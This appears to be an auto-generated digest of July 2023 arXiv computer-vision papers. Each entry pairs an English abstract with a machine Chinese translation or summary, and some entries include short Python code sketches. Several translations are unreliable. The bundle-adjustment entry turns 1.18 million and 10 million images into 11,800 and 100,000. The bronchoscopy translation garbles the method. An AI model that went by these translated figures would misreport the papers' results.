    Abstract We propose a distributed bundle adjustment (DBA) method using the exact Levenberg-Marquardt (LM) algorithm for super large-scale datasets. Most of the existing methods partition the global map to small ones and conduct bundle adjustment in the submaps. In order to fit the parallel framework, they use approximate solutions instead of the LM algorithm. However, those methods often give sub-optimal results. Different from them, we utilize the exact LM algorithm to conduct global bundle adjustment where the formation of the reduced camera system (RCS) is actually parallelized and executed in a distributed way. To store the large RCS, we compress it with a block-based sparse matrix compression format (BSMC), which fully exploits its block feature. The BSMC format also enables the distributed storage and updating of the global RCS. The proposed method is extensively evaluated and compared with the state-of-the-art pipelines using both synthetic and real datasets. Preliminary results demonstrate the efficient memory usage and vast scalability of the proposed method compared with the baselines. For the first time, we conducted parallel bundle adjustment using LM algorithm on a real datasets with 1.18 million images and a synthetic dataset with 10 million images (about 500 times that of the state-of-the-art LM-based BA) on a distributed computing system.
    摘要 我们提议一种分布式束适应(DBA)方法,使用精确的Levenberg-Marquardt(LM)算法进行超大规模数据集处理。现有的方法通常将全球地图分割成小地图,并在子地图中进行束适应。为适应并行框架,它们通常使用估计而不是LM算法。然而,这些方法通常会给出低于优化的结果。与之不同的是,我们利用精确的LM算法来进行全球束适应,并将Camera系统的减少(RCS)实际上并行并在分布式环境中执行。为存储大RCS,我们使用块基本稀疏矩阵压缩格式(BSMC),这种格式充分利用了块特点。BSMC格式还允许分布式存储和更新全球RCS。我们提出的方法与现有的管道进行了广泛的评估和比较,使用了真实和 sintetic 数据集。初步结果表明我们的方法具有高效的内存使用和广泛的扩展性,与基eline相比。此外,我们首次在真实数据集上进行了并行束适应,使用LM算法,并处理1.18万张图像和10万张图像(约500倍于现有LM基于BA的状态)在分布式计算系统上。
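
The BSMC idea, keeping only the non-zero camera-camera blocks of the reduced camera system so that they can be stored and updated independently across workers, can be illustrated with a tiny Python container. This is only the block-indexing scheme; the actual compression format and distributed updates in the paper are not reproduced here.

```python
import numpy as np

class BlockSparseMatrix:
    """Minimal block-based sparse storage (BSMC-style sketch).
    Dense blocks of the reduced camera system are kept in a dict,
    keyed by their (block_row, block_col) coordinates."""

    def __init__(self, block_size):
        self.bs = block_size
        self.blocks = {}                          # (bi, bj) -> [bs, bs] ndarray

    def add(self, bi, bj, block):
        key = (bi, bj)
        if key in self.blocks:
            self.blocks[key] += block             # accumulate contributions
        else:
            self.blocks[key] = block.copy()

    def matvec(self, x, n_blocks):
        """y = A @ x, iterating only over the stored non-zero blocks."""
        y = np.zeros(n_blocks * self.bs)
        for (bi, bj), blk in self.blocks.items():
            y[bi * self.bs:(bi + 1) * self.bs] += blk @ x[bj * self.bs:(bj + 1) * self.bs]
        return y
```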

Self-supervised Monocular Depth Estimation: Let’s Talk About The Weather

  • paper_url: http://arxiv.org/abs/2307.08357
  • repo_url: https://github.com/kieran514/robustdepth
  • paper_authors: Kieran Saunders, George Vogiatzis, Luis Manso
  • for: 这篇论文旨在提出一种伪监督(pseudo-supervised)方法,使自监督单目深度估计模型能够在不同天气和光照条件下保持高性能。
  • methods: 该方法使用计算机图形学和生成模型对现有的晴天数据进行数据增强,以模拟不利天气效果;此外,还使用伪监督损失函数来提升深度和位姿估计的性能。
  • results: 测试结果表明,该方法(Robust-Depth)在 KITTI 数据集上达到了最先进的性能,并在 DrivingStereo、Foggy CityScape 和 NuScenes-Night 等具有恶劣天气条件的数据集上显著超越现有方法。
    Abstract Current, self-supervised depth estimation architectures rely on clear and sunny weather scenes to train deep neural networks. However, in many locations, this assumption is too strong. For example in the UK (2021), 149 days consisted of rain. For these architectures to be effective in real-world applications, we must create models that can generalise to all weather conditions, times of the day and image qualities. Using a combination of computer graphics and generative models, one can augment existing sunny-weather data in a variety of ways that simulate adverse weather effects. While it is tempting to use such data augmentations for self-supervised depth, in the past this was shown to degrade performance instead of improving it. In this paper, we put forward a method that uses augmentations to remedy this problem. By exploiting the correspondence between unaugmented and augmented data we introduce a pseudo-supervised loss for both depth and pose estimation. This brings back some of the benefits of supervised learning while still not requiring any labels. We also make a series of practical recommendations which collectively offer a reliable, efficient framework for weather-related augmentation of self-supervised depth from monocular video. We present extensive testing to show that our method, Robust-Depth, achieves SotA performance on the KITTI dataset while significantly surpassing SotA on challenging, adverse condition data such as DrivingStereo, Foggy CityScape and NuScenes-Night. The project website can be found here https://kieran514.github.io/Robust-Depth-Project/.
    摘要 当前的自助学深度估算架构假设需要清晰的天气和日光照明来训练深度学习模型。然而,在许多地方,这个假设是太强大。例如在英国(2021年),有149天雨天。为了使这些架构在实际应用中效果,我们需要创建可以总结到所有天气条件、时间和图像质量的模型。使用计算机图形和生成模型,我们可以对现有的晴天数据进行多种修改,以模拟不利的天气效果。尽管这可能看起来有趣,但在过去,这些数据修改方法实际上会降低性能而不是提高它。在这篇论文中,我们提出了一种使用修改来解决这个问题的方法。通过利用未修改和修改数据之间的对应关系,我们引入了一种假超级vised损失函数,用于估算深度和pose。这种方法可以带来一些supervised学习的好处,而不需要任何标签。我们还提供了一系列实用的建议,这些建议共同组成一个可靠、高效的气候相关数据修改框架,用于自助学深度从单光视频中的估算。我们对KITTI数据集进行了广泛的测试,并证明了我们的方法Robust-Depth可以在KITTI数据集上达到SotA性能,并在抗气候条件数据集上(如DrivingStereo、Foggy CityScape和NuScenes-Night)表现出显著超过SotA。 project网站的地址为https://kieran514.github.io/Robust-Depth-Project/.
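
The pseudo-supervised idea exploits that the augmented frame depicts exactly the same geometry as the clean frame, so the clean-weather prediction can act as a detached target for the augmented one on top of the usual self-supervised objective. The sketch below covers the depth branch only; the pose branch, loss weighting, and `photometric_loss` signature are placeholders and assumptions.

```python
import torch

def robust_depth_losses(depth_net, clean, augmented, photometric_loss):
    """Pseudo-supervised weather training (sketch).

    `clean` / `augmented` are the same frame before and after weather
    augmentation, so their true depths are identical by construction.
    `photometric_loss` stands in for the usual self-supervised monocular
    depth loss computed on the clean sequence.
    """
    d_clean = depth_net(clean)
    d_aug = depth_net(augmented)
    # The clean prediction is the pseudo label; stop-gradient so the
    # augmented branch is pulled towards it, not the other way round.
    pseudo = torch.abs(d_aug - d_clean.detach()).mean()
    return photometric_loss(d_clean, clean) + pseudo
```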

Box-DETR: Understanding and Boxing Conditional Spatial Queries

  • paper_url: http://arxiv.org/abs/2307.08353
  • repo_url: https://github.com/tiny-smart/box-detr
  • paper_authors: Wenze Liu, Hao Lu, Yuliang Liu, Zhiguo Cao
  • for: 提高DETR的快速启动和检测性能
  • methods: 使用 conditional spatial queries 和 conditional linear projection,并将盒子信息转化为头specific agent points
  • results: 提高了收敛速度和检测性能,例如基于 DAB-DETR、使用 ResNet-50 的单尺度模型达到了 $44.2$ AP。
    Abstract Conditional spatial queries are recently introduced into DEtection TRansformer (DETR) to accelerate convergence. In DAB-DETR, such queries are modulated by the so-called conditional linear projection at each decoder stage, aiming to search for positions of interest such as the four extremities of the box. Each decoder stage progressively updates the box by predicting the anchor box offsets, while in cross-attention only the box center is informed as the reference point. The use of only box center, however, leaves the width and height of the previous box unknown to the current stage, which hinders accurate prediction of offsets. We argue that the explicit use of the entire box information in cross-attention matters. In this work, we propose Box Agent to condense the box into head-specific agent points. By replacing the box center with the agent point as the reference point in each head, the conditional cross-attention can search for positions from a more reasonable starting point by considering the full scope of the previous box, rather than always from the previous box center. This significantly reduces the burden of the conditional linear projection. Experimental results show that the box agent leads to not only faster convergence but also improved detection performance, e.g., our single-scale model achieves $44.2$ AP with ResNet-50 based on DAB-DETR. Our Box Agent requires minor modifications to the code and has negligible computational workload. Code is available at https://github.com/tiny-smart/box-detr.
    摘要 条件空间查询(conditional spatial queries)最近被引入 DEtection TRansformer(DETR)以加速收敛。在 DAB-DETR 中,这些查询在每个解码器阶段由所谓的 conditional linear projection 进行调制,以搜索感兴趣的位置,例如盒体的四个端点。每个解码器阶段通过预测锚框偏移量逐步更新盒体,而在交叉注意力中只有盒体中心被用作参考点。然而,仅使用盒体中心作为参考点,使得当前阶段无法知道上一个盒体的宽度和高度,从而阻碍偏移量的精确预测。我们认为,在交叉注意力中显式使用完整的盒体信息十分重要。为此,我们提出 Box Agent,将盒体信息压缩为各注意力头特定的代理点(agent point)。通过在每个注意力头中用代理点取代盒体中心作为参考点,条件交叉注意力可以在考虑上一个盒体完整范围的基础上,从更合理的起点开始搜索,而不是总是从上一个盒体中心开始。这显著减轻了 conditional linear projection 的负担。实验结果表明,Box Agent 不仅带来更快的收敛,也提升了检测性能,例如我们基于 DAB-DETR、使用 ResNet-50 的单尺度模型达到了 $44.2$ AP。我们的 Box Agent 只需对代码做少量修改,计算开销可以忽略不计。代码可以在 https://github.com/tiny-smart/box-detr 上获取。
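
The core of the Box Agent is replacing the shared box centre with one reference point per attention head, expressed in units of the previous box's width and height. The module below is a hedged sketch of that mapping only; whether the per-head offsets are static parameters or predicted per query, and how they enter cross-attention, are assumptions not taken from the paper.

```python
import torch
import torch.nn as nn

class BoxAgent(nn.Module):
    """Head-specific agent points (sketch). Each head gets a learned offset in
    normalised box coordinates, so reference points cover the full extent of
    the previous box instead of only its centre."""

    def __init__(self, num_heads):
        super().__init__()
        self.offsets = nn.Parameter(torch.zeros(num_heads, 2))  # per-head (dx, dy)

    def forward(self, boxes):
        # boxes: [B, Q, 4] as (cx, cy, w, h) from the previous decoder stage
        center, size = boxes[..., :2], boxes[..., 2:]
        # [B, Q, H, 2]: centre shifted by a head-specific fraction of (w, h)
        return center.unsqueeze(2) + self.offsets * size.unsqueeze(2)
```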

Neural Modulation Fields for Conditional Cone Beam Neural Tomography

  • paper_url: http://arxiv.org/abs/2307.08351
  • repo_url: https://github.com/samuelepapa/cond-cbnt
  • paper_authors: Samuele Papa, David M. Knigge, Riccardo Valperga, Nikita Moriakov, Miltos Kofinas, Jan-Jakob Sonke, Efstratios Gavves
  • for: 提高CBCT重建精度
  • methods: 使用深度学习方法,包括conditional neural fields和Neural Modulation Field
  • results: 在不同数量的投影下,Conditional Cone Beam Neural Tomography表现更好,包括降低误差和提高精度
    Abstract Conventional Computed Tomography (CT) methods require large numbers of noise-free projections for accurate density reconstructions, limiting their applicability to the more complex class of Cone Beam Geometry CT (CBCT) reconstruction. Recently, deep learning methods have been proposed to overcome these limitations, with methods based on neural fields (NF) showing strong performance, by approximating the reconstructed density through a continuous-in-space coordinate based neural network. Our focus is on improving such methods, however, unlike previous work, which requires training an NF from scratch for each new set of projections, we instead propose to leverage anatomical consistencies over different scans by training a single conditional NF on a dataset of projections. We propose a novel conditioning method where local modulations are modeled per patient as a field over the input domain through a Neural Modulation Field (NMF). The resulting Conditional Cone Beam Neural Tomography (CondCBNT) shows improved performance for both high and low numbers of available projections on noise-free and noisy data.
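
Conditioning a single shared neural field on a per-patient modulation field can be realised with FiLM-style scale-and-shift of the hidden activations. The sketch below assumes a plain coordinate MLP backbone and a latent code per patient; the actual CondCBNT architecture, conditioning inputs, and output parameterisation are not reproduced here.

```python
import torch
import torch.nn as nn

class ModulatedField(nn.Module):
    """Conditional neural field (sketch): a shared coordinate MLP whose hidden
    features are modulated per patient by a small Neural-Modulation-Field-style
    network mapping (coordinate, patient code) -> (scale, shift)."""

    def __init__(self, latent_dim=64, hidden=128):
        super().__init__()
        self.backbone1 = nn.Linear(3, hidden)
        self.backbone2 = nn.Linear(hidden, hidden)
        self.head = nn.Linear(hidden, 1)                       # reconstructed density
        self.nmf = nn.Sequential(                              # modulation field
            nn.Linear(3 + latent_dim, hidden), nn.ReLU(),
            nn.Linear(hidden, 2 * hidden))

    def forward(self, coords, patient_code):
        # coords: [N, 3]; patient_code: [latent_dim], broadcast to every point
        code = patient_code.expand(coords.size(0), -1)
        scale, shift = self.nmf(torch.cat([coords, code], dim=-1)).chunk(2, dim=-1)
        h = torch.relu(self.backbone1(coords))
        h = torch.relu(scale * self.backbone2(h) + shift)      # local modulation
        return self.head(h)
```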

Adaptive Local Basis Functions for Shape Completion

  • paper_url: http://arxiv.org/abs/2307.08348
  • repo_url: https://github.com/yinghdb/adaptive-local-basis-functions
  • paper_authors: Hui Ying, Tianjia Shao, He Wang, Yin Yang, Kun Zhou
  • for: 这个论文的目的是完成部分点云数据的3D形状完成任务,使用深度隐函数。
  • methods: 该方法使用适应本地基函数,不受限制于特定的函数形式,通过这些基函数实现本地到本地的形状完成框架。
  • results: 该方法比现有方法更高效,能够保留本地几何细节,涵盖更多的形状,并且可以在未看过的几何上进行扩展。
    Abstract In this paper, we focus on the task of 3D shape completion from partial point clouds using deep implicit functions. Existing methods seek to use voxelized basis functions or the ones from a certain family of functions (e.g., Gaussians), which leads to high computational costs or limited shape expressivity. On the contrary, our method employs adaptive local basis functions, which are learned end-to-end and not restricted in certain forms. Based on those basis functions, a local-to-local shape completion framework is presented. Our algorithm learns sparse parameterization with a small number of basis functions while preserving local geometric details during completion. Quantitative and qualitative experiments demonstrate that our method outperforms the state-of-the-art methods in shape completion, detail preservation, generalization to unseen geometries, and computational cost. Code and data are at https://github.com/yinghdb/Adaptive-Local-Basis-Functions.
    摘要 在这篇论文中,我们关注使用深度隐函数从部分点云进行3D形状补全的任务。现有方法通常使用体素化基函数或某一特定函数族(例如高斯函数),这会导致高计算成本或形状表达能力受限。相反,我们的方法使用自适应局部基函数,这些基函数通过端到端学习获得,不受特定形式的限制。基于这些基函数,我们提出了一种局部到局部的形状补全框架。我们的算法只需少量基函数即可学习稀疏参数化,同时在补全过程中保留局部几何细节。定量和定性实验表明,我们的方法在形状补全、细节保留、对未见几何体的泛化以及计算成本方面都优于当前最先进的方法。代码和数据可以在 https://github.com/yinghdb/Adaptive-Local-Basis-Functions 上找到。

Soft Curriculum for Learning Conditional GANs with Noisy-Labeled and Uncurated Unlabeled Data

  • paper_url: http://arxiv.org/abs/2307.08319
  • repo_url: None
  • paper_authors: Kai Katsumata, Duc Minh Vo, Tatsuya Harada, Hideki Nakayama
  • for: 用于提高 conditional generative adversarial network 的训练,使其能够处理含有噪声和无标签数据的情况。
  • methods: 提出了一种新的 Conditional Image Generation 框架,该框架在训练时接受噪声和无标签数据,并使用 soft curriculum learning 来杜绝噪声和无标签数据的影响。
  • results: 对比 semi-supervised 和 label-noise 鲁棒方法,提出的方法在量化和质量上均达到了更高的表现。特别是,该方法能够与少于半个标注数据的情况下匹配 semi-supervised GANs 的表现。
    Abstract Label-noise or curated unlabeled data is used to compensate for the assumption of clean labeled data in training the conditional generative adversarial network; however, satisfying such an extended assumption is occasionally laborious or impractical. As a step towards generative modeling accessible to everyone, we introduce a novel conditional image generation framework that accepts noisy-labeled and uncurated unlabeled data during training: (i) closed-set and open-set label noise in labeled data and (ii) closed-set and open-set unlabeled data. To combat it, we propose soft curriculum learning, which assigns instance-wise weights for adversarial training while assigning new labels for unlabeled data and correcting wrong labels for labeled data. Unlike popular curriculum learning, which uses a threshold to pick the training samples, our soft curriculum controls the effect of each training instance by using the weights predicted by the auxiliary classifier, resulting in the preservation of useful samples while ignoring harmful ones. Our experiments show that our approach outperforms existing semi-supervised and label-noise robust methods in terms of both quantitative and qualitative performance. In particular, the proposed approach is able to match the performance of (semi-) supervised GANs even with less than half the labeled data.
    摘要 标签噪声数据或经人工筛选的无标签数据通常被用来弥补条件生成对抗网络训练中对干净标注数据的假设;然而,满足这种扩展假设有时费力或不切实际。作为让每个人都能使用生成建模的一步,我们提出了一种新的条件图像生成框架,它在训练时可以接受噪声标签数据和未经筛选的无标签数据:(i)标注数据中的闭集和开集标签噪声,以及(ii)闭集和开集无标签数据。为此,我们提出了软课程学习(soft curriculum learning),它在对抗训练中为每个实例分配权重,同时为无标签数据分配新标签,并纠正标注数据中的错误标签。与使用阈值挑选训练样本的常见课程学习不同,我们的软课程通过辅助分类器预测的权重来控制每个训练实例的影响,从而保留有用的样本并忽略有害的样本。实验表明,我们的方法在定量和定性性能上都超过了现有的半监督和标签噪声鲁棒方法。特别地,即使标注数据不到一半,我们的方法也能达到与(半)监督GAN相当的性能。
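
A minimal rendering of the instance-wise weighting: an auxiliary classifier scores every sample, its confidence becomes a soft weight on the conditional discriminator loss, its argmax supplies pseudo-labels for unlabeled data, and a simple confidence comparison corrects given labels. The relabeling heuristic, loss form, and `discriminator(images, labels)` signature below are assumptions of this sketch, not the paper's exact formulation.

```python
import torch
import torch.nn.functional as F

def soft_curriculum_d_loss(discriminator, aux_classifier, images, given_labels=None):
    """Instance-weighted conditional discriminator loss on real samples (sketch).
    Every sample is weighted by the auxiliary classifier's confidence instead of
    being hard-selected by a threshold."""
    probs = F.softmax(aux_classifier(images), dim=1)
    conf, pseudo = probs.max(dim=1)                        # soft weights + labels
    if given_labels is None:
        labels = pseudo                                    # label the unlabeled
    else:
        given_conf = probs.gather(1, given_labels[:, None]).squeeze(1)
        labels = torch.where(conf > given_conf, pseudo, given_labels)  # correct labels
    logits = discriminator(images, labels)                 # conditional discriminator
    per_sample = F.binary_cross_entropy_with_logits(
        logits, torch.ones_like(logits), reduction="none")
    return (conf.detach() * per_sample.squeeze(-1)).mean()
```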

Airway Label Prediction in Video Bronchoscopy: Capturing Temporal Dependencies Utilizing Anatomical Knowledge

  • paper_url: http://arxiv.org/abs/2307.08318
  • repo_url: None
  • paper_authors: Ron Keuth, Mattias Heinrich, Martin Eichenlaub, Marian Himstedt
  • for: 本研究旨在提供无需电磁跟踪和患者特定CT扫描的视觉导航,从而使支气管镜导航能够用于重症监护等其他应用场景。
  • methods: 本研究仅利用支气管镜视频数据实现视觉导航,不需要电磁跟踪和患者特定CT扫描;通过将基于CNN的气道似然序列纳入隐马尔可夫模型,利用相对于跨患者气道模型的拓扑定位和解剖约束来提高导航精度。
  • results: 研究者通过在肺部体模中的多个实验评估了该方法,发现在考虑时间上下文并利用解剖知识进行正则化后,导航精度从基于单帧分类的0.81提升至0.98(加权F1:0.98 对 0.81)。这表明将基于CNN的气道段单帧分类与解剖约束及基于HMM的时间推理相结合,可以在无电磁跟踪和患者特定CT的情况下实现纯视觉导航。
    Abstract Purpose: Navigation guidance is a key requirement for a multitude of lung interventions using video bronchoscopy. State-of-the-art solutions focus on lung biopsies using electromagnetic tracking and intraoperative image registration w.r.t. preoperative CT scans for guidance. The requirement of patient-specific CT scans hampers the utilisation of navigation guidance for other applications such as intensive care units. Methods: This paper addresses navigation guidance solely incorporating bronchosopy video data. In contrast to state-of-the-art approaches we entirely omit the use of electromagnetic tracking and patient-specific CT scans. Guidance is enabled by means of topological bronchoscope localization w.r.t. an interpatient airway model. Particularly, we take maximally advantage of anatomical constraints of airway trees being sequentially traversed. This is realized by incorporating sequences of CNN-based airway likelihoods into a Hidden Markov Model. Results: Our approach is evaluated based on multiple experiments inside a lung phantom model. With the consideration of temporal context and use of anatomical knowledge for regularization, we are able to improve the accuracy up to to 0.98 compared to 0.81 (weighted F1: 0.98 compared to 0.81) for a classification based on individual frames. Conclusion: We combine CNN-based single image classification of airway segments with anatomical constraints and temporal HMM-based inference for the first time. Our approach renders vision-only guidance for bronchoscopy interventions in the absence of electromagnetic tracking and patient-specific CT scans possible.
    摘要 目的:用视频镜头导航是肺部内部手术中的关键需求,现代解决方案主要采用电磁 tracking和实时 CT 图像对比为导航。但这些方法受到patient-specific CT 图像的限制,不能用于医学加护部门。方法:本文提出一种具有唯视导航的方法,与现有方法不同之处在于完全不使用电磁 tracking和patient-specific CT 图像。我们通过基于隐藏 Markov 模型的空间排序和 CNN 网络来实现导航。特别是,我们利用隐藏 Markov 模型中的排序和 CNN 网络来使用排序的 temporal 上下文和空间上下文来进行补做,从而提高导航的准确性。结果:我们在肺部模型中进行了多个实验,结果表明,我们的方法可以提高准确性至 0.98,比对 individual 帧的分类结果更高(weighted F1 分数为 0.98,对比 0.81)。结论:我们结合了 CNN 网络基于单个图像分类和空间排序的方法,并利用 temporal HMM 模型来进行推理。这种方法可以在没有电磁 tracking和patient-specific CT 图像的情况下实现肺部内部手术的视野导航。
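
Concretely, the per-frame CNN soft-max scores act as HMM emissions, and the airway-tree adjacency constrains the transitions (stay in a segment or move to a neighbouring one); decoding the most likely branch sequence is then standard Viterbi. The NumPy sketch below illustrates that inference step; the self-transition probability is an assumed smoothing value.

```python
import numpy as np

def viterbi_airway(frame_likelihoods, adjacency, self_prob=0.9):
    """Topological bronchoscope localisation (sketch).

    frame_likelihoods: [T, S] CNN soft-max over S airway segments per frame.
    adjacency:         [S, S] boolean airway-tree adjacency, encoding the
                       sequential-traversal constraint.
    """
    S = adjacency.shape[0]
    trans = np.where(adjacency,
                     (1 - self_prob) / np.maximum(adjacency.sum(1, keepdims=True), 1),
                     0.0)
    np.fill_diagonal(trans, self_prob)           # allow staying in the same segment

    log_t = np.log(trans + 1e-12)
    log_e = np.log(frame_likelihoods + 1e-12)
    delta = log_e[0].copy()
    back = np.zeros((len(log_e), S), dtype=int)
    for t in range(1, len(log_e)):
        scores = delta[:, None] + log_t          # [S_prev, S_next]
        back[t] = scores.argmax(axis=0)
        delta = scores.max(axis=0) + log_e[t]
    path = [int(delta.argmax())]
    for t in range(len(log_e) - 1, 0, -1):       # backtrack the best sequence
        path.append(int(back[t, path[-1]]))
    return path[::-1]                            # most likely airway label per frame
```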

AltFreezing for More General Video Face Forgery Detection

  • paper_url: http://arxiv.org/abs/2307.08317
  • repo_url: https://github.com/zhendongwang6/altfreezing
  • paper_authors: Zhendong Wang, Jianmin Bao, Wengang Zhou, Weilun Wang, Houqiang Li
  • for: 这个论文主要应用于面伪造检测,对于已知的攻击方法进行防护。
  • methods: 本文提出了一种简洁而有效的方法，通过结合空间和时间特征来检测人脸伪造。具体来说，使用3D ConvNet同时捕捉空间和时间特征，并通过AltFreezing训练策略鼓励模型同时检测空间类型和时间类型的伪造痕迹。
  • results: 实验结果显示,该方法能够超越现有的方法,具有更好的扩展性和应用性。
    Abstract Existing face forgery detection models try to discriminate fake images by detecting only spatial artifacts (e.g., generative artifacts, blending) or mainly temporal artifacts (e.g., flickering, discontinuity). They may experience significant performance degradation when facing out-domain artifacts. In this paper, we propose to capture both spatial and temporal artifacts in one model for face forgery detection. A simple idea is to leverage a spatiotemporal model (3D ConvNet). However, we find that it may easily rely on one type of artifact and ignore the other. To address this issue, we present a novel training strategy called AltFreezing for more general face forgery detection. The AltFreezing aims to encourage the model to detect both spatial and temporal artifacts. It divides the weights of a spatiotemporal network into two groups: spatial-related and temporal-related. Then the two groups of weights are alternately frozen during the training process so that the model can learn spatial and temporal features to distinguish real or fake videos. Furthermore, we introduce various video-level data augmentation methods to improve the generalization capability of the forgery detection model. Extensive experiments show that our framework outperforms existing methods in terms of generalization to unseen manipulations and datasets. Code is available at https: //github.com/ZhendongWang6/AltFreezing.
    摘要 现有的人脸伪造检测模型通常只检测空间伪影（例如生成伪影、融合痕迹）或主要检测时间伪影（例如闪烁、不连续），在面对域外伪影时往往出现明显的性能下降。本文提出在同一个模型中同时捕捉空间和时间伪影以进行人脸伪造检测。一个简单的想法是直接使用时空模型（3D ConvNet），但我们发现它容易只依赖其中一种伪影而忽略另一种。为了解决这一问题，我们提出了一种名为AltFreezing的新训练策略，旨在促使模型同时检测空间和时间伪影。它将时空网络的权重分为空间相关和时间相关两组，并在训练过程中交替冻结这两组权重，使模型能够学习空间和时间特征来区分真假视频。此外，我们还引入多种视频级数据增强方法，以提高伪造检测模型的泛化能力。大量实验表明，我们的框架在面对未见过的伪造方式和数据集时优于现有方法。代码可在 https://github.com/ZhendongWang6/AltFreezing 获取。
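A minimal sketch of the alternating-freeze idea described above, assuming a PyTorch 3D ConvNet whose Conv3d layers are split into temporal-related kernels (temporal kernel size > 1) and spatial-related ones. The split heuristic, alternation period, and usage loop are illustrative assumptions, not the authors' exact implementation.

```python
import torch.nn as nn

def split_spatiotemporal_params(model: nn.Module):
    """Heuristically split Conv3d parameters into temporal- and spatial-related groups."""
    temporal, spatial = [], []
    for module in model.modules():
        if isinstance(module, nn.Conv3d):
            # kernel_size = (T, H, W); kernels spanning time count as 'temporal-related'.
            group = temporal if module.kernel_size[0] > 1 else spatial
            group.extend(module.parameters())
    return temporal, spatial

def set_alternate_freezing(model: nn.Module, step: int, period: int = 1):
    """Freeze one weight group and train the other, alternating every `period` steps."""
    temporal, spatial = split_spatiotemporal_params(model)
    train_temporal = (step // period) % 2 == 0
    for p in temporal:
        p.requires_grad_(train_temporal)
    for p in spatial:
        p.requires_grad_(not train_temporal)

# Usage inside a training loop (model, loader, criterion, optimizer assumed to exist):
# for step, (clips, labels) in enumerate(loader):
#     set_alternate_freezing(model, step)
#     loss = criterion(model(clips), labels)
#     optimizer.zero_grad(); loss.backward(); optimizer.step()
```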

Bridging the Gap: Multi-Level Cross-Modality Joint Alignment for Visible-Infrared Person Re-Identification

  • paper_url: http://arxiv.org/abs/2307.08316
  • repo_url: None
  • paper_authors: Tengfei Liang, Yi Jin, Wu Liu, Tao Wang, Songhe Feng, Yidong Li
  • for: 解决可见光和infrared摄像头之间的人识别问题,即人识别任务中的跨模态图像检索问题。
  • methods: 提出了一种简单而有效的方法：多级跨模态联合对齐（MCJA），同时弥合模态层面与优化目标层面的差距，从而改进跨模态图像检索。
  • results: 实验表明，借助模态对齐增强和新的跨模态检索损失，该方法显著提升了跨模态检索性能，仅使用全局特征即可作为VI-ReID领域的强基线方法。
    Abstract Visible-Infrared person Re-IDentification (VI-ReID) is a challenging cross-modality image retrieval task that aims to match pedestrians' images across visible and infrared cameras. To solve the modality gap, existing mainstream methods adopt a learning paradigm converting the image retrieval task into an image classification task with cross-entropy loss and auxiliary metric learning losses. These losses follow the strategy of adjusting the distribution of extracted embeddings to reduce the intra-class distance and increase the inter-class distance. However, such objectives do not precisely correspond to the final test setting of the retrieval task, resulting in a new gap at the optimization level. By rethinking these keys of VI-ReID, we propose a simple and effective method, the Multi-level Cross-modality Joint Alignment (MCJA), bridging both modality and objective-level gap. For the former, we design the Modality Alignment Augmentation, which consists of three novel strategies, the weighted grayscale, cross-channel cutmix, and spectrum jitter augmentation, effectively reducing modality discrepancy in the image space. For the latter, we introduce a new Cross-Modality Retrieval loss. It is the first work to constrain from the perspective of the ranking list, aligning with the goal of the testing stage. Moreover, based on the global feature only, our method exhibits good performance and can serve as a strong baseline method for the VI-ReID community.
    摘要 可见光-红外行人重识别（VI-ReID）是一项具有挑战性的跨模态图像检索任务，旨在跨可见光与红外摄像头匹配行人图像。为了解决模态差距，现有主流方法将图像检索任务转化为图像分类任务，采用交叉熵损失和辅助度量学习损失，通过调整特征嵌入的分布来缩小类内距离、扩大类间距离。然而，这类目标并不精确对应检索任务最终的测试设置，从而在优化层面产生了新的差距。通过重新审视VI-ReID的这些关键问题，我们提出了一种简单而有效的方法：多级跨模态联合对齐（MCJA），同时弥合模态差距与目标差距。对于前者，我们设计了模态对齐增强，包含三种新策略：加权灰度化、跨通道CutMix和光谱抖动增强，可在图像空间有效降低模态差异。对于后者，我们引入了新的跨模态检索损失，这是首个从排序列表角度施加约束的工作，与测试阶段的目标保持一致。此外，仅基于全局特征，我们的方法即可取得良好性能，可作为VI-ReID社区的强基线方法。
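The three image-space augmentations named above (weighted grayscale, cross-channel CutMix, spectrum jitter) can be sketched roughly as follows; the sampling ranges, patch size, and mixing rules here are guesses for illustration, not the paper's settings.

```python
import random
import torch

def weighted_grayscale(img: torch.Tensor) -> torch.Tensor:
    """Collapse an RGB crop (3, H, W) to a randomly weighted single channel, replicated x3."""
    w = torch.rand(3)
    w = w / w.sum()
    gray = (img * w.view(3, 1, 1)).sum(dim=0, keepdim=True)
    return gray.repeat(3, 1, 1)

def cross_channel_cutmix(img: torch.Tensor, patch: int = 64) -> torch.Tensor:
    """Paste a random patch of one color channel into another channel."""
    out = img.clone()
    _, h, w = img.shape
    y = torch.randint(0, max(h - patch, 1), (1,)).item()
    x = torch.randint(0, max(w - patch, 1), (1,)).item()
    src, dst = torch.randperm(3)[:2].tolist()
    out[dst, y:y + patch, x:x + patch] = img[src, y:y + patch, x:x + patch]
    return out

def spectrum_jitter(img: torch.Tensor, strength: float = 0.3) -> torch.Tensor:
    """Randomly rescale each channel to perturb the spectral appearance."""
    scale = 1.0 + strength * (2 * torch.rand(3, 1, 1) - 1)
    return (img * scale).clamp(0, 1)

img = torch.rand(3, 256, 128)   # dummy visible-spectrum pedestrian crop
aug = random.choice([weighted_grayscale, cross_channel_cutmix, spectrum_jitter])(img)
```

All three operations push visible images toward intensity-like statistics, which is the stated goal of reducing the modality discrepancy directly in image space.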

Rethinking Intersection Over Union for Small Object Detection in Few-Shot Regime

  • paper_url: http://arxiv.org/abs/2307.09562
  • repo_url: None
  • paper_authors: Pierre Le Jeune, Anissa Mokraoui
  • for: 提高少样本目标检测中小目标的检测精度
  • methods: 使用尺度自适应交并比（Scale-adaptive Intersection over Union，SIoU）作为评价指标和训练损失函数
  • results: SIoU 显著提升了小目标检测性能，尤其是在以小目标为主的航拍图像（DOTA、DIOR）上取得了新的最先进的少样本检测性能
  • for: The paper is written to improve the accuracy of detecting small objects in few-shot object detection (FSOD) tasks.
  • methods: The paper proposes using a novel box similarity measure called Scale-adaptive Intersection over Union (SIoU) as an evaluation criterion and a loss function to prioritize small objects during training.
  • results: The paper shows that SIoU improves significantly the performance of small object detection in both natural (Pascal VOC and COCO datasets) and aerial images (DOTA and DIOR), especially in the aerial imagery where small objects are critical, and achieves new state-of-the-art FSOD performance on DOTA and DIOR.
